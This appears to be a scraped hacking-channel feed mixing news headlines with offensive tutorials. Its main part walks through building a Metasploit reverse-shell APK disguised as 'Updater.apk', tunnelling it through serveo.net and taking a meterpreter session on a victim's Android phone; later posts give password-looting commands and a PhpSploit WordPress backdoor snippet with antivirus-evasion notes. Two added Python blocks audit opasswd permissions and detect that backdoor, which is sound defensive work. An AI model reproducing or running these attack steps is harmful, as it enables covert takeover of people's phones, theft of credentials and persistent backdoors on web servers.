UNDERCODE COMMUNITY
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Hack Android Phone Using Another Android Phone?

YOU NEED:

1). Android 5.0 (or later. Tutorial for older versions will be published shortly ...)


2). TermuX Android App (Download from Play Store)


3). Installed Metasploit Framework in TermuX (tutorial here)


4). Active internet / WiFi connection


5). TermuX must be allowed to use external storage (just enter this command at once: "termux-setup-storage")


6). MiXplorer (download the APK file from UpToDown to sign the APK)


7). MiX Signer (APK Signer for MiXplorer, download it from the Play store)


🦑Step 1: Port forwarding

Many people use NGROK for port forwarding. But NGROK creates a new domain or port every time you reconnect to it. Reserved domains and ports are unfortunately only available to paid (premium) customers. That's why with NGROK you have to generate a new APK every time you start hacking.

BUT HERE ... we will be using Serveo. With Serveo, you can manually forward the desired port to the internet (and you can forward it again in the future). To use Serveo port forwarding, you must install the OpenSSH package for TermuX. To do this, enter this command in TermuX:

pkg install openssh


- It will install OpenSSH successfully

Once installed, just enter this:

ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net


- Details below

It might ask you about the default ssh or something like that. Just enter yes when it asks about it.

There are some points to keep in mind here. If you want to redirect the HTTP port, then select different ports in both Desired_Port fields. But here we will redirect a TCP port. To forward a TCP port, you must enter the same desired port in both Desired_Port fields. Also, don't change "localhost". Here we are going to forward TCP port 4564 (for example only). After forwarding

🦑Step 2: Build an APK with an embedded payload

To generate an APK with an embedded payload, enter this command in a NEW SESSION:

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/downloads/Updater.apk


- The link to Updater.apk is in the next third paragraph


Wait a minute ...



Ok ... Now the APK file with the embedded payload is successfully generated here: Phone / SD card storage -> Downloads -> Updater.apk

(OPTIONAL) You can use APK Editor Pro to change the name (default: MainActivity) and version of the generated APK file.


(Remember: This APK is not signed! You must sign it before using it to avoid problems.)


🦑Step 3: Signing the newly generated APK file

To sign the newly generated APK file,


Open MiXplorer File Manager and navigate to "Un-Signed APK File (Updater.apk)" (will be in your downloads folder).



Long press on "Un-Signed APK File (Updater.apk)" and select "MENU button" in the upper right corner of MiXplorer, then select "SIGN".


It will display various options for signing the APK (but "AUTO" is preferred).

Select AUTO to automatically and successfully sign the APK file.



Your APK file, (filename)-signed.apk, is now successfully signed and fully functional and is 9.9KB in size.


🦑Step 4: Configuring Metasploit in TermuX

Activate the Metasploit Framework in TermuX by entering this command in a new session:

msfconsole


- Metasploit Framework Console

mkdir -p $PREFIX/var/lib/postgresql

initdb $PREFIX/var/lib/postgresql

pg_ctl -D $PREFIX/var/lib/postgresql start


- Thanks to DUST WORLD for this fix ... !!!


Wait a minute ...


Now that msfconsole starts, type the following (bold) commands, one by one, carefully:

msf> use exploit/multi/handler

msf> set payload android/meterpreter/reverse_tcp

msf> set LHOST localhost

msf> set LPORT 4564

msf> exploit -j -z


- enter only bold commands


Step 5. Installing the APK on the victim's Android device.
sessions -i (session id)


- (Session ID) = 1, 2, 3, 4 or 5 ...

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Many vulnerabilities have been patched in VMware that could allow an attacker to exploit the whole system.
#Vulnerabilities
Forwarded from UNDERCODE NEWS
Suddenly, Huawei's commercial desktop PC is here! Want to move the cake?
#Technologies
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Updated windows hacking
One-Lin3r is a simple, modular and lightweight framework that gives you all the one-liners you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally, with a lot of new features to make all of this fully automated (e.g. you won't even need to copy the one-liners).

🄸🄽🅂🅃🄰🄻🄻🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

A) For Linux Debian-based distros (e.g. Kali, Ubuntu):
1) git clone https://github.com/D4Vinci/One-Lin3r.git

2) sudo apt install libncurses5-dev

3) sudo pip3 install ./One-Lin3r --user
one-lin3r -h

B) For the rest of the Linux distros:

1) git clone https://github.com/D4Vinci/One-Lin3r.git

2) sudo pip3 install ./One-Lin3r --user
one-lin3r -h

F E A T U R E S ::
It's designed to fix typos in typed commands to the most similar command with just one tab click, so seach becomes search and so on, even if you typed any random word similar to a command in this framework.
For you lazy ones out there like me, it can predict which liner you are trying to use when you type any part of it. For example, if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile. You are welcome!
If you typed a wrong command and then pressed enter, the framework will tell you the nearest command to what you typed, which could be the one you really wanted.
Some less impressive things, like auto-complete for variables after the set command, auto-complete for liners after the use and info commands, and finally it converts all uppercase to lowercase automatically, just in case you switched cases by mistake while typing.
Finally, you'll find the normal auto-completion things you were using before, like command auto-completion and persistent history, etc.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
From the IT perspective Predicting Biden’s US in 2021
#Analytiques
Forwarded from UNDERCODE NEWS
Young people “killed” by online loans
#international
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME LINUX TIPS :

A) Looting for passwords

Files containing passwords:
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

Old passwords in /etc/security/opasswd:
The /etc/security/opasswd file is also used by pam_cracklib to keep the history of old passwords so that the user will not reuse them.

B) ⚠️ Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes

Last edited files
Files that were edited in the last 10 minutes:

find / -mmin -10 2>/dev/null | grep -Ev "^/proc"

In-memory passwords:
strings /dev/mem -n10 | grep -i PASS

Find sensitive files:
$ locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password

(from git)
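
An added example (not part of the original post) that turns the opasswd warning above into a check: it reports when /etc/security/opasswd is owned by someone other than root, is accessible to "other", or grants any permission bit that /etc/shadow does not. The function name and the expected_uid parameter are assumptions made for this illustration.

```python
import os
import stat

SHADOW = "/etc/shadow"
OPASSWD = "/etc/security/opasswd"

def audit_opasswd(opasswd=OPASSWD, shadow=SHADOW, expected_uid=0):
    """Return findings (empty list = OK) for the password-history file."""
    try:
        op = os.stat(opasswd)
    except FileNotFoundError:
        return []  # no password history is kept on this host
    findings = []
    op_mode = stat.S_IMODE(op.st_mode)
    if op.st_uid != expected_uid:
        findings.append(
            f"{opasswd}: owner uid {op.st_uid}, expected {expected_uid}")
    if op_mode & stat.S_IRWXO:
        findings.append(
            f"{opasswd}: mode {op_mode:04o} grants access to 'other'")
    try:
        sh_mode = stat.S_IMODE(os.stat(shadow).st_mode)
    except FileNotFoundError:
        return findings  # nothing to compare against
    # Any bit set on opasswd but not on shadow makes the old hashes
    # easier to read than the current ones.
    extra = op_mode & ~sh_mode
    if extra:
        findings.append(
            f"{opasswd}: mode {op_mode:04o} is looser than {shadow} "
            f"({sh_mode:04o}); extra bits {extra:04o}")
    return findings

if __name__ == "__main__":
    results = audit_opasswd()
    for line in results or ["opasswd is at least as restricted as shadow"]:
        print(line)
```

Run it as root so that both files can be stat'ed; an empty result means the history file is protected at least as tightly as the shadow file.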
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Entos Information & Communication launches electronic access list + face recognition heat detection solution'NARMS
#international #Technologies
Forwarded from UNDERCODE NEWS
KT Holds’Communication Big Data Platform Road Show’, which gathered in one place for communication big data
#international
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Backdooring WordPress with Phpsploit:

PhpSploit is a remote control framework that aims to provide a stealth, interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable of maintaining access to a compromised web server for privilege escalation purposes.

🄸🄽🅂🅃🄰🄻🄻🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

download https://github.com/nil0x42/phpsploit

When running Phpsploit and generating a standard backdoor to place in WordPress or PHP code, it looks like this:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

The above code can be generated by running the following command:

./phpsploit --interactive --eval "backdoor"

And if we insert this little eval snippet into a WordPress PHP file and then upload the file to VirusTotal, the detection rate looks like this for the 58 different antivirus scanners currently online:

Just one hit, and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.

If we then run phpsploit again and set another PASSKEY

as example

And it should be quite easy to trigger IDS alerts at the network level, since PHP code like eval and base64_decode should not be part of an HTTP header. This can of course also be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.

from wpsec
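
An added detection example (not from the original post or from the PhpSploit project) covering the two signals described above: PHP source that passes a request header straight to eval(), matched for any header name because PASSKEY changes it, and request headers whose values contain PHP calls such as eval or base64_decode. The file names, header values and function names are constructed for this illustration.

```python
import re

# eval() fed directly from a request header. The name after HTTP_ is matched
# generically because the PASSKEY setting changes it.
EVAL_FROM_HEADER = re.compile(
    r"""eval\s*\(\s*\$_SERVER\s*\[\s*['"]HTTP_\w+['"]\s*\]""", re.IGNORECASE)
# PHP calls that should never appear inside an HTTP header value.
PHP_IN_HEADER = re.compile(r"\b(?:eval|base64_decode)\s*\(", re.IGNORECASE)

def scan_php_source(name, text):
    """Return (file, line number, line) for each eval-from-header match."""
    return [(name, n, line.strip())
            for n, line in enumerate(text.splitlines(), 1)
            if EVAL_FROM_HEADER.search(line)]

def suspicious_headers(headers):
    """Return the names of request headers whose value contains PHP calls."""
    return sorted(k for k, v in headers.items() if PHP_IN_HEADER.search(v))

# Constructed sample files: the default snippet from the post, the same
# snippet with a different header name, and a harmless header read.
SAMPLE_FILES = {
    "wp-content/themes/x/functions.php":
        "<?php\nadd_action('init', 'x_setup');\n"
        "@eval($_SERVER['HTTP_PHPSPL01T']);\n",
    "wp-includes/renamed.php":
        '<?php @eval( $_SERVER[ "HTTP_X_CACHE_ID" ] ); ?>\n',
    "wp-includes/benign.php":
        "<?php $ua = $_SERVER['HTTP_USER_AGENT']; echo strlen($ua);\n",
}
# Constructed request: one header value carries PHP code (placeholder body).
SAMPLE_REQUEST = {
    "Host": "blog.example",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
    "Phpspl01t": "eval(base64_decode('PLACEHOLDER'))",
}

def scan_all(files):
    """Scan a {name: source} mapping and return all hits in name order."""
    hits = []
    for name in sorted(files):
        hits.extend(scan_php_source(name, files[name]))
    return hits

if __name__ == "__main__":
    for name, lineno, line in scan_all(SAMPLE_FILES):
        print(f"{name}:{lineno}: {line}")
    print("suspicious headers:", suspicious_headers(SAMPLE_REQUEST))
```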
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Veraport's abused supply chain attack, how do general users respond?
#Vulnerabilities #CyberAttacks
Forwarded from UNDERCODE NEWS
Chinese electronic social security card application exceeds 300 million.
#Analytiques